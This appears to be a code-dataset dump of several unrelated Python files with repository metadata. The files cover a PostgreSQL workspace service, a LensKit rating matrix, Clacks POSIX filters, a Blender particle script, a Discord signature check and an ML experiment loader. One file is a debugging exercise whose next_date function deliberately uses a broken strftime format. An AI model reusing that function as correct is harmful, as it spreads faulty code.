DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams,
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams,
Configuration, Range
)
from pgsqltoolsservice.workspace.script_file import ScriptFile
from pgsqltoolsservice.workspace.workspace import Workspace
class WorkspaceService:
"""
Class for handling requests/events that deal with the sate of the workspace including opening
and closing of files, the changing of configuration, etc.
"""
def __init__(self):
self._service_provider: ServiceProvider = None
self._server: JSONRPCServer = None
self._logger: [Logger, None] = None
self._workspace: Workspace = None
# Create a workspace that will handle state for the session
self._workspace = Workspace()
self._configuration: Configuration = Configuration()
# Setup callbacks for the various events we can receive
self._config_change_callbacks: List[Callable[Configuration]] = []
self._text_change_callbacks: List[Callable[ScriptFile]] = []
self._text_open_callbacks: List[Callable[ScriptFile]] = []
self._text_close_callbacks: List[Callable[ScriptFile]] = []
def register(self, service_provider: ServiceProvider) -> None:
self._service_provider = service_provider
self._logger = service_provider.logger
self._server = service_provider.server
# Register the handlers for when changes to the workspace occur
self._server.set_notification_handler(DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_change_text_doc)
self._server.set_notification_handler(DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_open_text_doc)
self._server.set_notification_handler(DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_close_text_doc)
# Register handler for when the configuration changes
self._service_provider.server.set_notification_handler(DID_CHANGE_CONFIG_NOTIFICATION,
self._handle_did_change_config)
# PROPERTIES ###########################################################
@property
def configuration(self) -> Configuration:
return self._configuration
@property
def workspace(self) -> Workspace:
"""Gets the current workspace"""
return self._workspace
# METHODS ##############################################################
def register_config_change_callback(self, task: Callable[[Configuration], None]) -> None:
self._config_change_callbacks.append(task)
def register_text_change_callback(self, task: Callable[[ScriptFile], None]) -> None:
self._text_change_callbacks.append(task)
def register_text_close_callback(self, task: Callable[[ScriptFile], None]) -> None:
self._text_close_callbacks.append(task)
def register_text_open_callback(self, task: Callable[[ScriptFile], None]) -> None:
self._text_open_callbacks.append(task)
def get_text(self, file_uri: str, selection_range: Optional[Range]) -> str:
"""
Get the requested text selection, as a string, for a document
:param file_uri: The URI of the requested file
:param selection_data: An object containing information about which part of the file to return,
or None for the whole file
:raises ValueError: If there is no file matching the given URI
"""
open_file = self._workspace.get_file(file_uri)
if open_file is None:
raise ValueError('No file corresponding to the given URI')
if selection_range is None:
return open_file.get_all_text()
else:
return open_file.get_text_in_range(selection_range)
# REQUEST HANDLERS #####################################################
def _handle_did_change_config(
self,
notification_context: NotificationContext,
params: DidChangeConfigurationParams
) -> None:
"""
Handles the configuration change event by storing the new configuration and calling all
registered config change callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
self._configuration = params.settings
for callback in self._config_change_callbacks:
callback(self._configuration)
def _handle_did_change_text_doc(
self,
notification_context: NotificationContext,
params: DidChangeTextDocumentParams
) -> None:
"""
Handles text document change notifications
:param notification_context: Context of the notification
:param params: Parameters of the notification
"""
try:
# Skip processing if the file isn't opened
script_file: ScriptFile = self._workspace.get_file(params.text_document.uri)
if script_file is None:
return
# Apply the changes to the document
for text_change in params.content_changes:
script_file.apply_change(text_change)
# Propagate the changes to the registered callbacks
for callback in self._text_change_callbacks:
callback(script_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc change: {e}')
def _handle_did_open_text_doc(
self,
notification_context: NotificationContext,
params: DidOpenTextDocumentParams
) -> None:
"""
Handles when a file is opened in the workspace. The event is propagated to the registered
file open callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
try:
# Open a new ScriptFile with the initial buffer provided
opened_file: ScriptFile = self._workspace.open_file(params.text_document.uri, params.text_document.text)
if opened_file is None:
return
# Propagate the notification to the registered callbacks
for callback in self._text_open_callbacks:
callback(opened_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc open: {e}')
def _handle_did_close_text_doc(
self,
notification_context: NotificationContext,
params: DidCloseTextDocumentParams
) -> None:
"""
Handles when a file is closed in the workspace. The event is propagated to the registered
file close callbacks
:param notification_context: Context of the notification
:param params: Parameters from the notification
"""
try:
# Attempt to close the requested file
closed_file: ScriptFile = self._workspace.close_file(params.text_document.uri)
if closed_file is None:
return
# Propagate the notification to the registered callbacks
for callback in self._text_close_callbacks:
callback(closed_file)
except Exception as e:
if self._logger is not None:
self._logger.exception(f'Exception caught during text doc close: {e}')
| 2,059
| 0
| 187
|
21b26de6d2b9d84edfee3500275c6ffa369001c4
| 2,322
|
py
|
Python
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 210
|
2018-06-09T19:39:19.000Z
|
2022-03-19T15:14:23.000Z
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 301
|
2018-06-14T22:03:24.000Z
|
2022-03-11T23:05:57.000Z
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 57
|
2018-09-25T00:34:38.000Z
|
2022-02-21T10:09:56.000Z
|
"""
Data manipulation routines.
"""
from collections import namedtuple
import logging
import scipy.sparse as sps
import numpy as np
import pandas as pd
from csr import CSR
_log = logging.getLogger(__name__)
RatingMatrix = namedtuple('RatingMatrix', ['matrix', 'users', 'items'])
RatingMatrix.__doc__ = """
A rating matrix with associated indices.
Attributes:
matrix(CSR or scipy.sparse.csr_matrix):
The rating matrix, with users on rows and items on columns.
users(pandas.Index): mapping from user IDs to row numbers.
items(pandas.Index): mapping from item IDs to column numbers.
"""
def sparse_ratings(ratings, scipy=False, *, users=None, items=None):
"""
Convert a rating table to a sparse matrix of ratings.
Args:
ratings(pandas.DataFrame): a data table of (user, item, rating) triples.
scipy(bool):
if ``True`` or ``'csr'``, return a SciPy csr matrix instead of
:py:class:`CSR`. if ``'coo'``, return a SciPy coo matrix.
users(pandas.Index): an index of user IDs.
items(pandas.Index): an index of items IDs.
Returns:
RatingMatrix:
a named tuple containing the sparse matrix, user index, and item index.
"""
if users is None:
users = pd.Index(np.unique(ratings.user), name='user')
if items is None:
items = pd.Index(np.unique(ratings.item), name='item')
_log.debug('creating matrix with %d ratings for %d items by %d users',
len(ratings), len(items), len(users))
row_ind = users.get_indexer(ratings.user).astype(np.intc)
if np.any(row_ind < 0):
raise ValueError('provided user index does not cover all users')
col_ind = items.get_indexer(ratings.item).astype(np.intc)
if np.any(col_ind < 0):
raise ValueError('provided item index does not cover all users')
if 'rating' in ratings.columns:
vals = np.require(ratings.rating.values, np.float64)
else:
vals = None
if scipy == 'coo':
matrix = sps.coo_matrix(
(vals, (row_ind, col_ind)), shape=(len(users), len(items))
)
else:
matrix = CSR.from_coo(row_ind, col_ind, vals, (len(users), len(items)))
if scipy:
matrix = matrix.to_scipy()
return RatingMatrix(matrix, users, items)
| 31.378378
| 83
| 0.646856
|
"""
Data manipulation routines.
"""
from collections import namedtuple
import logging
import scipy.sparse as sps
import numpy as np
import pandas as pd
from csr import CSR
_log = logging.getLogger(__name__)
RatingMatrix = namedtuple('RatingMatrix', ['matrix', 'users', 'items'])
RatingMatrix.__doc__ = """
A rating matrix with associated indices.
Attributes:
matrix(CSR or scipy.sparse.csr_matrix):
The rating matrix, with users on rows and items on columns.
users(pandas.Index): mapping from user IDs to row numbers.
items(pandas.Index): mapping from item IDs to column numbers.
"""
def sparse_ratings(ratings, scipy=False, *, users=None, items=None):
"""
Convert a rating table to a sparse matrix of ratings.
Args:
ratings(pandas.DataFrame): a data table of (user, item, rating) triples.
scipy(bool):
if ``True`` or ``'csr'``, return a SciPy csr matrix instead of
:py:class:`CSR`. if ``'coo'``, return a SciPy coo matrix.
users(pandas.Index): an index of user IDs.
items(pandas.Index): an index of items IDs.
Returns:
RatingMatrix:
a named tuple containing the sparse matrix, user index, and item index.
"""
if users is None:
users = pd.Index(np.unique(ratings.user), name='user')
if items is None:
items = pd.Index(np.unique(ratings.item), name='item')
_log.debug('creating matrix with %d ratings for %d items by %d users',
len(ratings), len(items), len(users))
row_ind = users.get_indexer(ratings.user).astype(np.intc)
if np.any(row_ind < 0):
raise ValueError('provided user index does not cover all users')
col_ind = items.get_indexer(ratings.item).astype(np.intc)
if np.any(col_ind < 0):
raise ValueError('provided item index does not cover all users')
if 'rating' in ratings.columns:
vals = np.require(ratings.rating.values, np.float64)
else:
vals = None
if scipy == 'coo':
matrix = sps.coo_matrix(
(vals, (row_ind, col_ind)), shape=(len(users), len(items))
)
else:
matrix = CSR.from_coo(row_ind, col_ind, vals, (len(users), len(items)))
if scipy:
matrix = matrix.to_scipy()
return RatingMatrix(matrix, users, items)
| 0
| 0
| 0
|
a68ba59292f9e55761ad77efab34d937b8208857
| 6,218
|
py
|
Python
|
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | 2
|
2015-01-26T07:15:19.000Z
|
2015-11-09T13:42:11.000Z
|
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | null | null | null |
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | null | null | null |
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
from clacks.agent.objects.filter import ElementFilter
from clacks.agent.objects.backend.registry import ObjectBackendRegistry
from clacks.common.error import ClacksErrorHandler as C
from clacks.common.utils import N_
# Register the errors handled by us
C.register_codes(dict(
PARAMETER_NOT_NUMERIC=N_("Parameter for '%(target)s' have to be numeric"),
BACKEND_TOO_MANY=N_("Too many backends for %(target)s specified"),
POSIX_ID_POOL_EMPTY=N_("ID pool for attribute %(target)s is empty [> %(max)s]")
))
class GenerateIDs(ElementFilter):
"""
Generate gid/uidNumbers on demand
"""
class LoadGecosState(ElementFilter):
"""
Detects the state of the autoGECOS attribute
"""
class GenerateGecos(ElementFilter):
"""
An object filter which automatically generates the posix-gecos
entry.
"""
def process(self, obj, key, valDict):
"""
The out-filter that generates the new gecos value
"""
# Only generate gecos if the the autoGECOS field is True.
if len(valDict["autoGECOS"]['value']) and (valDict["autoGECOS"]['value'][0]):
gecos = GenerateGecos.generateGECOS(valDict)
valDict["gecos"]['value'] = [gecos]
return key, valDict
@staticmethod
def generateGECOS(valDict):
"""
This method genereates a new gecos value out of the given properties list.
"""
sn = ""
givenName = ""
ou = ""
telephoneNumber = ""
homePhone = ""
if len(valDict["sn"]['value']) and (valDict["sn"]['value'][0]):
sn = valDict["sn"]['value'][0]
if len(valDict["givenName"]['value']) and (valDict["givenName"]['value'][0]):
givenName = valDict["givenName"]['value'][0]
if len(valDict["homePhone"]['value']) and (valDict["homePhone"]['value'][0]):
homePhone = valDict["homePhone"]['value'][0]
if len(valDict["telephoneNumber"]['value']) and (valDict["telephoneNumber"]['value'][0]):
telephoneNumber = valDict["telephoneNumber"]['value'][0]
if len(valDict["ou"]['value']) and (valDict["ou"]['value'][0]):
ou = valDict["ou"]['value'][0]
return "%s %s,%s,%s,%s" % (sn, givenName, ou, telephoneNumber, homePhone)
class GetNextID(ElementFilter):
"""
An object filter which inserts the next free ID for the property
given as parameter. But only if the current value is empty.
=============== =======================
Name Description
=============== =======================
attributeName The target attribute we want to generate an ID for. uidNumber/gidNumber
maxValue The maximum value that would be dsitributed.
=============== =======================
"""
| 35.942197
| 107
| 0.600193
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
from clacks.agent.objects.filter import ElementFilter
from clacks.agent.objects.backend.registry import ObjectBackendRegistry
from clacks.common.error import ClacksErrorHandler as C
from clacks.common.utils import N_
# Register the errors handled by us
C.register_codes(dict(
PARAMETER_NOT_NUMERIC=N_("Parameter for '%(target)s' have to be numeric"),
BACKEND_TOO_MANY=N_("Too many backends for %(target)s specified"),
POSIX_ID_POOL_EMPTY=N_("ID pool for attribute %(target)s is empty [> %(max)s]")
))
class PosixException(Exception):
pass
class GenerateIDs(ElementFilter):
"""
Generate gid/uidNumbers on demand
"""
def __init__(self, obj):
super(GenerateIDs, self).__init__(obj)
def process(self, obj, key, valDict, maxGidValue=65500, maxUidValue=65500):
try:
maxUidValue = int(maxUidValue)
maxGidValue = int(maxGidValue)
except ValueError:
raise PosixException(C.make_error("PARAMETER_NOT_NUMERIC", "GenerateIDs"))
if "uidNumber" in valDict:
if not(len(valDict['uidNumber']['value'])):
if len(valDict["uidNumber"]['backend']) > 1:
raise PosixException(C.make_error("BACKEND_TOO_MANY", "GenerateIDs"))
be = ObjectBackendRegistry.getBackend(valDict["uidNumber"]['backend'][0])
uid = be.get_next_id("uidNumber")
if uid > maxUidValue:
raise PosixException(C.make_error("POSIX_ID_POOL_EMPTY", "uidNumber", max=maxUidValue))
valDict["uidNumber"]['value'] = [uid]
if "gidNumber" in valDict:
if not(len(valDict['gidNumber']['value'])):
if len(valDict["gidNumber"]['backend']) > 1:
raise PosixException(C.make_error("BACKEND_TOO_MANY", "GenerateIDs"))
be = ObjectBackendRegistry.getBackend(valDict["gidNumber"]['backend'][0])
gid = be.get_next_id("gidNumber")
if gid > maxGidValue:
raise PosixException(C.make_error("POSIX_ID_POOL_EMPTY", "gidNumber", max=maxGidValue))
valDict["gidNumber"]['value'] = [gid]
return key, valDict
class LoadGecosState(ElementFilter):
"""
Detects the state of the autoGECOS attribute
"""
def __init__(self, obj):
super(LoadGecosState, self).__init__(obj)
def process(self, obj, key, valDict):
# No gecos set right now
if not(len(valDict['gecos']['value'])):
valDict[key]['value'] = [True]
return key, valDict
# Check if current gecos value would match the generated one
# We will then assume that this user wants to auto update his gecos entry.
gecos = GenerateGecos.generateGECOS(valDict)
if gecos == valDict['gecos']['value'][0]:
valDict[key]['value'] = [True]
return key, valDict
# No auto gecos
valDict[key]['value'] = [False]
return key, valDict
class GenerateGecos(ElementFilter):
"""
An object filter which automatically generates the posix-gecos
entry.
"""
def __init__(self, obj):
super(GenerateGecos, self).__init__(obj)
def process(self, obj, key, valDict):
"""
The out-filter that generates the new gecos value
"""
# Only generate gecos if the the autoGECOS field is True.
if len(valDict["autoGECOS"]['value']) and (valDict["autoGECOS"]['value'][0]):
gecos = GenerateGecos.generateGECOS(valDict)
valDict["gecos"]['value'] = [gecos]
return key, valDict
@staticmethod
def generateGECOS(valDict):
"""
This method genereates a new gecos value out of the given properties list.
"""
sn = ""
givenName = ""
ou = ""
telephoneNumber = ""
homePhone = ""
if len(valDict["sn"]['value']) and (valDict["sn"]['value'][0]):
sn = valDict["sn"]['value'][0]
if len(valDict["givenName"]['value']) and (valDict["givenName"]['value'][0]):
givenName = valDict["givenName"]['value'][0]
if len(valDict["homePhone"]['value']) and (valDict["homePhone"]['value'][0]):
homePhone = valDict["homePhone"]['value'][0]
if len(valDict["telephoneNumber"]['value']) and (valDict["telephoneNumber"]['value'][0]):
telephoneNumber = valDict["telephoneNumber"]['value'][0]
if len(valDict["ou"]['value']) and (valDict["ou"]['value'][0]):
ou = valDict["ou"]['value'][0]
return "%s %s,%s,%s,%s" % (sn, givenName, ou, telephoneNumber, homePhone)
class GetNextID(ElementFilter):
"""
An object filter which inserts the next free ID for the property
given as parameter. But only if the current value is empty.
=============== =======================
Name Description
=============== =======================
attributeName The target attribute we want to generate an ID for. uidNumber/gidNumber
maxValue The maximum value that would be dsitributed.
=============== =======================
"""
def __init__(self, obj):
super(GetNextID, self).__init__(obj)
def process(self, obj, key, valDict, attributeName="uidNumber", maxValue=65500):
if len(valDict[key]['value']) and (valDict[key]['value'][0] == -1):
maxValue = int(maxValue)
if len(valDict[key]['backend']) > 1:
raise PosixException(C.make_error("BACKEND_TOO_MANY", "GetNextID"))
be = ObjectBackendRegistry.getBackend(valDict[key]['backend'][0])
gid = be.get_next_id(attributeName)
if gid > maxValue:
raise PosixException(C.make_error("POSIX_ID_POOL_EMPTY", attributeName, max=maxValue))
valDict[key]['value'] = [gid]
return key, valDict
| 2,905
| 20
| 208
|
26aa104e94d0d68739f234e5b0e9ad3e892fb26d
| 1,724
|
py
|
Python
|
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
import bpy
import numpy as np
import glob
# Global consts
WIDTH = 160
HEIGHT = 120
PROJECT_PATH = "/PATH/TO/bad_apple_blender_cube"
FRAME_COUNT = len(glob.glob(f'{PROJECT_PATH}/frames/*.jpg'))
# Prepare particle system
cube = bpy.data.objects["Cube"]
degp = bpy.context.evaluated_depsgraph_get()
particle_systems = cube.evaluated_get(degp).particle_systems
particle_systems[0].settings.count = WIDTH * HEIGHT
particle_systems[0].settings.lifetime = 99999
particle_systems[0].settings.frame_start = -1
particle_systems[0].settings.frame_end = 1
particle_systems[0].settings.emit_from = 'VOLUME'
particle_systems[0].settings.physics_type = 'NO'
particle_systems[0].settings.render_type = 'OBJECT'
particle_systems[0].settings.instance_object = cube
particle_systems[0].settings.particle_size = 1.0
# reset particle locations
particles = particle_systems[0].particles
total_particles = len(particles)
flat_list = [0]*(3*total_particles)
particles.foreach_set("location", flat_list)
# load all locations into memory
locations_arr = np.zeros(shape=(FRAME_COUNT, WIDTH*HEIGHT*3))
for i in range(FRAME_COUNT):
temp_arr = np.load(
f"{PROJECT_PATH}/locations/{i}.npy")
locations_arr[i] = temp_arr
def particles_location_setter(scene, degp):
"""
Set particle locations to a flat numpy array
"""
particle_systems = cube.evaluated_get(degp).particle_systems
particles = particle_systems[0].particles
current_frame = scene.frame_current
particles.foreach_set("location", locations_arr[current_frame])
# clear the post frame handler
bpy.app.handlers.frame_change_post.clear()
# run the function on each frame
bpy.app.handlers.frame_change_post.append(particles_location_setter)
| 30.245614
| 68
| 0.774362
|
import bpy
import numpy as np
import glob
# Global consts
WIDTH = 160
HEIGHT = 120
PROJECT_PATH = "/PATH/TO/bad_apple_blender_cube"
FRAME_COUNT = len(glob.glob(f'{PROJECT_PATH}/frames/*.jpg'))
# Prepare particle system
cube = bpy.data.objects["Cube"]
degp = bpy.context.evaluated_depsgraph_get()
particle_systems = cube.evaluated_get(degp).particle_systems
particle_systems[0].settings.count = WIDTH * HEIGHT
particle_systems[0].settings.lifetime = 99999
particle_systems[0].settings.frame_start = -1
particle_systems[0].settings.frame_end = 1
particle_systems[0].settings.emit_from = 'VOLUME'
particle_systems[0].settings.physics_type = 'NO'
particle_systems[0].settings.render_type = 'OBJECT'
particle_systems[0].settings.instance_object = cube
particle_systems[0].settings.particle_size = 1.0
# reset particle locations
particles = particle_systems[0].particles
total_particles = len(particles)
flat_list = [0]*(3*total_particles)
particles.foreach_set("location", flat_list)
# load all locations into memory
locations_arr = np.zeros(shape=(FRAME_COUNT, WIDTH*HEIGHT*3))
for i in range(FRAME_COUNT):
temp_arr = np.load(
f"{PROJECT_PATH}/locations/{i}.npy")
locations_arr[i] = temp_arr
def particles_location_setter(scene, degp):
"""
Set particle locations to a flat numpy array
"""
particle_systems = cube.evaluated_get(degp).particle_systems
particles = particle_systems[0].particles
current_frame = scene.frame_current
particles.foreach_set("location", locations_arr[current_frame])
# clear the post frame handler
bpy.app.handlers.frame_change_post.clear()
# run the function on each frame
bpy.app.handlers.frame_change_post.append(particles_location_setter)
| 0
| 0
| 0
|
03b416a08b5dc25b0e21740642be9908f184d5ba
| 2,163
|
py
|
Python
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions.py
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 19
|
2021-01-07T23:57:20.000Z
|
2022-01-23T19:49:46.000Z
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions-wrapper
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 4
|
2021-01-09T01:18:31.000Z
|
2021-06-11T22:39:45.000Z
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions-wrapper
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 2
|
2021-05-21T01:08:19.000Z
|
2021-09-25T03:12:44.000Z
|
#!/usr/bin/env python
"""
MIT License
Original work Copyright (c) 2020 Ian Webster
Modified work Copyright (c) 2020-2021 Linus Bartsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from discord_interactions import InteractionType, InteractionCallbackType, verify_key
from flask import request, jsonify
from functools import wraps
| 37.293103
| 88
| 0.714286
|
#!/usr/bin/env python
"""
MIT License
Original work Copyright (c) 2020 Ian Webster
Modified work Copyright (c) 2020-2021 Linus Bartsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from discord_interactions import InteractionType, InteractionCallbackType, verify_key
from flask import request, jsonify
from functools import wraps
def verify_key_decorator(client_public_key):
def _decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
# Verify request
signature = request.headers.get("X-Signature-Ed25519")
timestamp = request.headers.get("X-Signature-Timestamp")
if (
signature is None
or timestamp is None
or not verify_key(request.data, signature, timestamp, client_public_key)
):
return "Bad request signature", 401
# Automatically respond to pings
if request.json and request.json.get("type") == InteractionType.PING:
return jsonify({"type": InteractionCallbackType.PONG})
# Pass through
return f(*args, **kwargs)
return wrapper
return _decorator
| 824
| 0
| 23
|
a2d3c862606cac3220edb171c369ca9b33ceab18
| 1,856
|
py
|
Python
|
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
practice/troubleshooting/compare_problem.py
|
jhabboubi/GoogleAutomation
|
eb2c79f5ff5e5d600de83f406f24e6d79e0d8fda
|
[
"MIT"
] | null | null | null |
"""
The datetime module supplies classes for manipulating dates and times, and contains many types, objects, and methods.
You've seen some of them used in the dow function, which returns the day of the week for a specific date. We'll use them
again in the next_date function, which takes the date_string parameter in the format of "year-month-day", and uses the add_year function
to calculate the next year that this date will occur (it's 4 years later for the 29th of February during Leap Year, and 1 year later for all other dates).
Then it returns the value in the same format as it receives the date: "year-month-day".
Can you find the error in the code? Is it in the next_date function or the add_year function?
How can you determine if the add_year function returns what it's supposed to? Add debug lines as necessary
to find the problems, then fix the code to work as indicated above.
"""
import datetime
from datetime import date
today = date.today() # Get today's date
print(next_date(str(today)))
# Should return a year from today, unless today is Leap Day
print(next_date("2021-01-01")) # Should return 2022-01-01
print(next_date("2020-02-29")) # Should return 2024-02-29
| 45.268293
| 154
| 0.755927
|
"""
The datetime module supplies classes for manipulating dates and times, and contains many types, objects, and methods.
You've seen some of them used in the dow function, which returns the day of the week for a specific date. We'll use them
again in the next_date function, which takes the date_string parameter in the format of "year-month-day", and uses the add_year function
to calculate the next year that this date will occur (it's 4 years later for the 29th of February during Leap Year, and 1 year later for all other dates).
Then it returns the value in the same format as it receives the date: "year-month-day".
Can you find the error in the code? Is it in the next_date function or the add_year function?
How can you determine if the add_year function returns what it's supposed to? Add debug lines as necessary
to find the problems, then fix the code to work as indicated above.
"""
import datetime
from datetime import date
def add_year(date_obj):
try:
new_date_obj = date_obj.replace(year = date_obj.year + 1)
except ValueError:
# This gets executed when the above method fails,
# which means that we're making a Leap Year calculation
new_date_obj = date_obj.replace(year = date_obj.year + 4)
return new_date_obj
def next_date(date_string):
# Convert the argument from string to date object
date_obj = datetime.datetime.strptime(date_string, r"%Y-%m-%d")
next_date_obj = add_year(date_obj)
# Convert the datetime object to string,
# in the format of "yyyy-mm-dd"
next_date_string = next_date_obj.strftime("yyyy-mm-dd")
return next_date_string
today = date.today() # Get today's date
print(next_date(str(today)))
# Should return a year from today, unless today is Leap Day
print(next_date("2021-01-01")) # Should return 2022-01-01
print(next_date("2020-02-29")) # Should return 2024-02-29
| 615
| 0
| 46
|
1a36054e4b7418274e99314f78d19465e2792514
| 18,963
|
py
|
Python
|
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
pairwise_classification/one_part_exp.py
|
dreamysx/lorelei
|
e17b13309ab57920690c843b92eab0178190ec20
|
[
"MIT"
] | null | null | null |
from __future__ import division
import json
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from sklearn.linear_model import LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier as RFC
import pandas as pd
import operator
from sklearn.metrics import roc_curve, precision_recall_curve, precision_recall_fscore_support
print 'IMPORTANT: experiment can be modified by changing parameter combinations in main function!'
print 'loading data...'
part1_pos_10 = json.loads(open("new_dedup_part1_pos_10.json").read()) # 1552
part1_pos_200 = json.loads(open("new_dedup_part1_pos_200_embed.json").read())
part1_pos_walk_200 = json.loads(open("new_dedup_part1_pos_200_walk.json").read())
part2_pos_10 = json.loads(open("new_dedup_part2_pos_10.json").read()) # 24251
part2_pos_200 = json.loads(open("new_dedup_part2_pos_200_embed.json").read())
part2_pos_walk_200 = json.loads(open("new_dedup_part2_pos_200_walk.json").read())
part3_pos_10 = json.loads(open("new_dedup_part3_pos_10.json").read()) # 1353
part3_pos_200 = json.loads(open("new_dedup_part3_pos_200_embed.json").read())
part3_pos_walk_200 = json.loads(open("new_dedup_part3_pos_200_walk.json").read())
part4_pos_10 = json.loads(open("new_dedup_part4_pos_10.json").read()) # 3399
part4_pos_200 = json.loads(open("new_dedup_part4_pos_200_embed.json").read())
part4_pos_walk_200 = json.loads(open("new_dedup_part4_pos_200_walk.json").read())
part5_pos_10 = json.loads(open("new_dedup_part5_pos_10.json").read()) # 11692
part5_pos_200 = json.loads(open("new_dedup_part5_pos_200_embed.json").read())
part5_pos_walk_200 = json.loads(open("new_dedup_part5_pos_200_walk.json").read())
global_pos_10 = json.loads(open("new_dedup_global_pos_10.json").read()) # 1552
global_pos_200 = json.loads(open("new_dedup_global_pos_200_embed.json").read())
global_pos_walk_200 = json.loads(open("new_dedup_global_pos_200_walk.json").read())
global_neg_10 = json.loads(open("new_dedup_global_neg_10.json").read()) # 1552
global_neg_200 = json.loads(open("new_dedup_global_neg_200_embed.json").read())
global_neg_walk_200 = json.loads(open("new_dedup_global_neg_200_walk.json").read())
# combinations of each partition
# 901
part1_pos_10_walk = combineData(source1_pos=part1_pos_10, source2_pos=part1_pos_walk_200)
part1_pos_10_walk_dv = combineData(source1_pos=part1_pos_10, source3_pos=part1_pos_200, source2_pos=part1_pos_walk_200)
# 12294
part2_pos_10_walk = combineData(source1_pos=part2_pos_10, source2_pos=part2_pos_walk_200)
part2_pos_10_walk_dv = combineData(source1_pos=part2_pos_10, source3_pos=part2_pos_200, source2_pos=part2_pos_walk_200)
# 895
part3_pos_10_walk = combineData(source1_pos=part3_pos_10, source2_pos=part3_pos_walk_200)
